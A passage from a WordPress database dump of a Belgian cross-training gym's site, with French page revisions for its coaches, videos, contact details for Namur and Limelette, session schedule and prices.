290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-11-04 17:24:23', '2013-11-04 17:24:23', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(368, 1, '2013-11-04 17:25:06', '2013-11-04 17:25:06', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-11-04 17:25:06', '2013-11-04 17:25:06', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(369, 1, '2013-11-04 17:25:41', '2013-11-04 17:25:41', '<h1>Retrouvez ici les vidéos illustrant le déroulements des séances</h1>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n\r\nPrésentation du Cross Training Namur\r\n\r\n<iframe src=\"//www.youtube.com/embed/_os-BkWwGKU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n<iframe src=\"//www.youtube.com/embed/dgKynOMF_HI\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'En images', '', 'publish', 'closed', 'open', '', 'en-images', '', '', '2015-04-22 07:39:30', '2015-04-22 07:39:30', '', 0, 'http://www.crosstrainingcenter.be/?page_id=369', 0, 'page', '', 0),
(476, 1, '2015-04-21 09:06:14', '2015-04-21 09:06:14', '<h1>Retrouvez ici les vidéos illustrant le déroulements des séances</h1>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n\r\n<div align=\"center\">\r\n\r\nPrésentation du Cross Training Namur\r\n\r\n<iframe src=\"//www.youtube.com/embed/z_jNG_jQ8gU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n\r\n</div>\r\n\r\n</div></td>\r\n\r\n</tr>\r\n</table>', 'En images', '', 'inherit', 'open', 'open', '', '369-revision-v1', '', '', '2015-04-21 09:06:14', '2015-04-21 09:06:14', '', 369, 'http://www.crosstrainingcenter.be/369-revision-v1/', 0, 'revision', '', 0),
(370, 1, '2013-11-04 17:25:41', '2013-11-04 17:25:41', '<h1>Retrouvez ici les vidéos illustrant le déroulements des séances</h1>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n\r\n<div align=\"center\">\r\n\r\nPrésentation du Cross Training Namur\r\n\r\n<iframe src=\"//www.youtube.com/embed/z_jNG_jQ8gU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n\r\n</div>\r\n\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n\r\n<div align=\"center\">\r\n\r\nOuverture du Cross Training Limelette\r\n\r\n<iframe src=\"//www.youtube.com/embed/6tWEAsQ_ePQ\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n\r\n</div>\r\n\r\n</div></td>\r\n</tr>\r\n</table>', 'En images', '', 'inherit', 'open', 'open', '', '369-revision-v1', '', '', '2013-11-04 17:25:41', '2013-11-04 17:25:41', '', 369, 'http://www.crosstrainingcenter.be/369-revision-v1/', 0, 'revision', '', 0),
(371, 1, '2013-11-04 17:26:03', '2013-11-04 17:26:03', ' ', '', '', 'publish', 'open', 'open', '', '371', '', '', '2015-04-21 08:50:04', '2015-04-21 08:50:04', '', 0, 'http://www.crosstrainingcenter.be/?p=371', 5, 'nav_menu_item', '', 0),
(372, 1, '2013-11-04 17:27:40', '2013-11-04 17:27:40', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Limelette</h1>\r\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Club Justine Henin\r\nAvenue Léon Fournet, 20\r\n1342 Limelette</address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Namur</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez, 251\r\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>&nbsp;</h1>\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]\r\n</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>&nbsp;</h1>\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\"></h1>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-11-04 17:27:40', '2013-11-04 17:27:40', '', 9, 'http://www.crosstrainingcenter.be/9-revision-v1/', 0, 'revision', '', 0),
(373, 1, '2013-11-04 17:37:10', '2013-11-04 17:37:10', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>&nbsp;</h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n<img class=\"size-full wp-image-446 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\" usemap=\"#imagemap\" width=\"300\" height=\"236\" />\r\n\r\n<map id=\"Map\" name=\"imagemap\"> <area coords=\"90,84,166,108\" shape=\"namur\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\"\" /> <area coords=\"174,121,233,132\" shape=\"limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\" /> </map>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-11-04 17:37:10', '2013-11-04 17:37:10', '', 11, 'http://www.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(374, 1, '2013-11-04 17:37:32', '2013-11-04 17:37:32', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>&nbsp;</h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n<img class=\"size-full wp-image-446 aligncenter\" alt=\"map\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\" usemap=\"#imagemap\" width=\"300\" height=\"236\" />\r\n\r\n<map id=\"Map\" name=\"imagemap\"> <area coords=\"90,84,166,108\" shape=\"namur\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\"\" /> <area coords=\"174,121,233,132\" shape=\"limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\" /> </map>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-11-04 17:37:32', '2013-11-04 17:37:32', '', 11, 'http://www.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(375, 1, '2013-11-04 17:38:19', '2013-11-04 17:38:19', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>&nbsp;</h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n<img class=\"size-full wp-image-446 aligncenter\" alt=\"map\" src=\"http://www.crosstrainingcenter.be/map.png\" usemap=\"#imagemap\" width=\"300\" height=\"236\" />\r\n\r\n<map id=\"Map\" name=\"imagemap\"> <area coords=\"90,84,166,108\" shape=\"namur\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\"\" /> <area coords=\"174,121,233,132\" shape=\"limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\" /> </map>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-11-04 17:38:19', '2013-11-04 17:38:19', '', 11, 'http://www.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(376, 1, '2013-11-04 17:38:55', '2013-11-04 17:38:55', '<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training (réservation obligatoire)</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Prix', '', 'inherit', 'open', 'open', '', '214-revision-v1', '', '', '2013-11-04 17:38:55', '2013-11-04 17:38:55', '', 214, 'http://www.crosstrainingcenter.be/214-revision-v1/', 0, 'revision', '', 0),
(377, 1, '2013-11-04 17:38:55', '2013-11-04 17:38:55', '<blockquote>\r\n<h1>Envie de vous essayer au cross training?</h1>\r\n</blockquote>\r\nVenez nous rencontrer afin de découvrir le déroulement d\'une séance de cross training.\r\n\r\nLaissez-nous vos coordonnées et nous vous recontacterons afin de planifier avec vous votre première séance gratuite.\r\n\r\n[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]', 'Séance gratuite', '', 'inherit', 'open', 'open', '', '266-revision-v1', '', '', '2013-11-04 17:38:55', '2013-11-04 17:38:55', '', 266, 'http://www.crosstrainingcenter.be/266-revision-v1/', 0, 'revision', '', 0),
(378, 1, '2013-11-04 17:39:40', '2013-11-04 17:39:40', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2013-11-04 17:39:40', '2013-11-04 17:39:40', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
